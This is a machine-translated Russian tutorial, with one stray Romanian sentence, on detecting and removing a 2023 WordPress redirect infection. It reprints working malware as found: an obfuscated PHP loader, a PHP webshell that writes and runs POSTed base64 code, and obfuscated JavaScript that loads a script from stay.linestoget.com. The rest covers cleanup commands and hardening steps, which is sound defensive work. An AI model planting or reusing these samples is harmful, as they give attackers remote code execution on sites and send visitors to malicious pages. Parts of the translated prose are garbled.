WordPress, безусловно, самая используемая платформа CMS (Content Management System) Как для блогов, так и для онлайн -стартовых магазинов (с модулем WooCommerce), что делает его наиболее целенаправленным для компьютерных атак (взлом). Одна из наиболее часто используемых операций по хакерской деятельности направлена на то, чтобы перенаправить скомпрометированный веб -сайт на другие веб -страницы. Redirect WordPress Hack 2023 - это относительно новое вредоносное ПО, которое влияет на перенаправление всего сайта на спам -страницы или которая, в свою очередь, может вирус пользователей компьютеров.
содержание
Если ваш сайт, разработанный на WordPress, перенаправляется на другом сайте, то жертва уже является знаменитым хакерством перенаправления.
În acest tutorial o să găsești informațiile necesare și sfaturile utile prin care poți să devirusezi un website infectat cu redirect WordPress Hack (Virus Redirect)Полем Через комментарии вы можете получить дополнительную информацию или попросить о помощи.
Обнаружение вируса, перенаправляя сайты WordPress
Внезапное и неоправданное уменьшение трафика на сайте, уменьшить количество заказов (в случае интернет -магазинов) или рекламные квитанции являются первыми признаками того, что что -то не так. Обнаружение “Redirect WordPress Hack 2023” (Перенаправить вирус) может быть сделан и “визуальный” При открытии сайта и перенаправлено на другую веб -страницу.
Из опыта большинство приложений для веб -вредоносных программ совместимы с интернет -браузерами: Chrome, Firefox, Edge, OperaПолем Если вы пользователь компьютера Mac, эти вирусы не очень заметны в браузере Safari. Система безопасности сафари молчаливо блокирует эти злонамеренные сценарии.
Что вам нужно сделать, если у вас есть веб -сайт wordpress hack word hack virus
Я надеюсь, что первая мера не в том, чтобы паниковать и не удалить веб -сайт. Даже файлы вируса или вируса не должны быть удалены на первом этапе. Они содержат ценную информацию, которая может помочь вам понять, где находится нарушение безопасности и что повлиял на вирус. Modus operandi.
Закрыть веб -сайт для общественности.
Как закрыть веб -сайт вируса для посетителей? Самое простое - использовать DNS Manager и удалить его IP для “А” (доменное имя) или определить несуществующий IP. Таким образом, посетители веб -сайта будут защищены от этого перенаправления взлома WordPress, который может взять их на веб -страницы вируса или спама.
Если вы используете CloudFlare Как DNS Manager, вы аутентифицируетесь в своей учетной записи и удаляете записи DNS “A” для доменного имени. Таким образом, область, затронутая вирусом, останется без IP, а не может быть доступна из Интернета.
Скопируйте IP на веб -сайте и сделайте “маршрут” Чтобы иметь возможность получить доступ только к вам. С вашего компьютера.
Как изменить реальный IP -адрес сайта на компьютерах Windows?
Метод часто используется для блокировки доступа к определенным веб -сайтам путем редактирования файла “хозяева”Полем
1. Откройте блокнот или другой текстовый редактор (с правами администратора) и отредактируйте файл “hosts“Полем Он расположен в:
C:\Windows\System32\drivers\etc\hosts2. В файле “хозяева” добавлять “маршрут” к настоящему IP на вашем сайте. IP удален выше из DNS Manager.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Сохраните файл и получите доступ к веб -сайту в браузере.
Если веб -сайт не открывается, и вы не допустили ошибки в файле “хозяева”, скорее всего, это кеш DNS.
Чтобы удалить кэш DNS в операционной системе Windows, открыть командную строку, где вы выполняете заказ:
ipconfig /flushdnsКак изменить реальный IP -адрес веб -сайта на компьютерах Mac / MacBook?
Для пользователей компьютеров Mac немного проще изменить реальный IP -адрес веб -сайта.
1. Откройте утилиту TerminalПолем
2. Выполните командную строку (требуется системный пароль для выполнения):
sudo nano /etc/hosts3. Что касается компьютеров Windows, добавьте настоящий IP домена.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Сохраните изменения. Ctrl+X (y)Полем
После того, как вы сделали “маршрут”Вы единственный человек, который может получить доступ к веб -сайту WordPress Hack Word Hack Virus.
Полный сайт резервного копирования – Файлы и база данных
Даже если это вирус с “перенаправить WordPress Hack”Рекомендация состоит в том, чтобы сделать общее резервное копирование всего веб -сайта. Файлы и база данных. Возможно, вы могли бы сохранить локальную копию обоих файлов в public / public_html а также база данных.
Идентификация вируса и модифицированных файлов перенаправления WordPress Hack 2023
Основные целевые файлы WordPress Я index.php (в корне), header.phpВ index.php и footer.php активной темы WordPress. Вручную проверьте эти файлы и определите код Malicid или сценарий вредоносного ПО.
В 2023 году вирус типа “Перенаправить WordPress Hack” вставить index.php Код формы:
(Я не рекомендую вам выполнять эти коды!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Декодировано, это Сценарий вредоносной программы Это практически следствие веб -сайта WordPress. Это не сценарий, который является основой приложения вредоносного ПО, но именно сценарий позволяет перенаправить веб -страницу вируса. Если мы расшифруем сценарий выше, мы получим:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Что касается всех файлов на сервере, содержащем этот код, хорошо иметь доступ SSH на сервер для запуска файлов проверки -UP и администрирования в Linux.
Связанный: Как вы обнаружите, есть ли у вас блог о вирусе или нет, с помощью поиска Google. (WordPress virus)
Ниже приведены две команды, которые, безусловно, полезны для идентификации недавно измененных файлов и файлов, содержащих конкретный код (строка).
Как вы видите файлы PHP, измененные за последние 24 часа или в другой диапазон времени на Linux?
Командование “find” Он очень прост в использовании и позволяет персонализации установить период времени, патч, в котором выполняются поиск и тип файлов.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"В выводе вы получите информацию о дате и времени, когда файл был изменен, разрешения на написание / чтение / выполнение (chmod) и чья группа / пользователь принадлежит.
Если вы хотите проверить несколько дней назад, измените значение “-mtime -1” или использовать “-mmin -360” В течение нескольких минут (6 часов).
Как вы ищете код (строка) внутри файлов PHP, Java?
Командная строка “находить” через которые вы можете быстро найти все файлы PHP или Java, содержащие конкретный код, следующие:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +Порядок поиска и отображать файлы .php и .js содержащий “uJjBRODYsU“Полем
С помощью двух заказов выше вы найдете очень легко, какие файлы были изменены в последнее время и содержат код вредоносного ПО.
Удаляет вредоносное ПО из модифицированных файлов без ущерба для правильного кода. В моем сценарии код вредоносных программ был размещен перед открытием <head>Полем
При исполнении первого порядка “находить” Очень возможно обнаружить новые файлы на сервере, которые не являются WordPress и не помещаются туда. Файлы, которые провозглашают вирус WordPress Hack Redirece.
В сценарии, изученном мной, файлы формы появились на сервере “wp-log-nOXdgD.php“Полем Это файлы “поколение” который также содержит код вредоносного ПО, используемый вирусом перенаправления.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Цель типовых файлов “wp-log-*” Он должен распространять вирус хакерства перенаправления и другие веб -сайты, размещенные на сервере. Это тип кода вредоносного ПО “webshell” состоит из одного Основной раздел (в котором определены некоторые зашифрованные переменные) и O раздел исполнения с помощью которого злоумышленник пытается загрузить и выполнить код вредоносного ПО в системе.
Если есть переменная POST называется ‘bh‘ и его зашифрованное значение MD5 равен “8f1f964a4b4d8d1ac3f0386693d28d03“, тогда сценарий, кажется, пишет зашифрованный контент base64 другой переменной называется ‘b3‘ во временном файле, а затем попробуйте включить этот временный файл.
Если есть переменная POST или GET называется ‘tick'Сценарий ответит значением MD5 строки “885“Полем
Чтобы идентифицировать все файлы на сервере, содержащем этот код, выберите общую строку, а затем выполните команду “find” (аналогично вышеупомянутому). Удалить все файлы, содержащие этот код вредоносного ПОПолем
Нарушение безопасности, управляемое перенаправлением WordPress Hack
Скорее всего, этот вирус перенаправления достигает Эксплуатация пользователя WordPress или путем определения уязвимый плагин что позволяет добавлять пользователей с привилегиями администратора.
Для большинства веб -сайтов, созданных на платформе WordPress, возможно Редактирование тем по темам или плагинук интерфейсу администрирования (Dashboard) Таким образом, вредоносный человек может добавить файлы вредоносного ПО, который генерирует сценарии, представленные выше.
Примером такого вредоносного ПО является:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript Определено в заголовке темы WordPress, сразу после открытия этикетки <head>Полем
В этом JavaScript довольно сложно расшифровать, но очевидно, что другой веб -адрес, скорее всего, принесет другие сценарии для создания файлов “wp-log-*” о котором я говорил выше.
Поиск и удалите этот код из всех файлов PHP затронутый.
Насколько я мог понять, этот код был добавлено вручную новым пользователем с административными привилегиями.
Таким образом, чтобы предотвратить добавление вредоносного ПО в приборной панели, лучше всего отключить WordPress / Plugins на приборной панели.
Отредактируйте файл wp-config.php и добавить линии:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);После того, как вы внесете это изменение, ни один пользователь WordPress не сможет редактировать файлы панели панели.
Проверьте пользователей с ролью администратора
Ниже приведен запрос SQL, который вы можете использовать для поиска пользователей с администратором на платформе WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Этот запрос вернет всех пользователей в таблице wp_users Кто приписывал роль администратора. Запрос сделан для таблицы wp_usermeta искать в мета ‘wp_capabilities', Который содержит информацию о ролях пользователей.
Другой метод - идентифицировать их из: Dashboard → Users → All Users → AdministratorПолем Но я практикую, пользователь может быть спрятан на панели панели панели. Итак, лучший способ увидеть пользователей “Администратор” WordPress - это команда SQL выше.
В моем случае я идентифицировал в базе данных пользователь с именем “wp-import-user“Полем Довольно наводящему.
Отсюда вы можете увидеть дату и время, когда был создан пользователь WordPress. Пользователь пользователя также очень важен, потому что он искал в журналах сервера. Таким образом, вы можете увидеть всю деятельность этого пользователя.
Удалить пользователей с роли администратора что ты не знаешь, тогда Измените свои пароли всем административным пользователям. Редактор, автор, администратор.
Измените пароль пользователя SQL в базу данных из пострадавшего сайта.
После принятия этих шагов веб -сайт может быть перезапущен для всех пользователей.
Обратите внимание, однако, что то, что я представил выше, является одной из тысяч косо, с помощью которой веб -сайт с перенаправлением WordPress Hack в 2023 году.
Если ваш сайт был вирусом и нуждается в помощи или если у вас есть какие -либо проблемы, ящик для комментариев открыт.
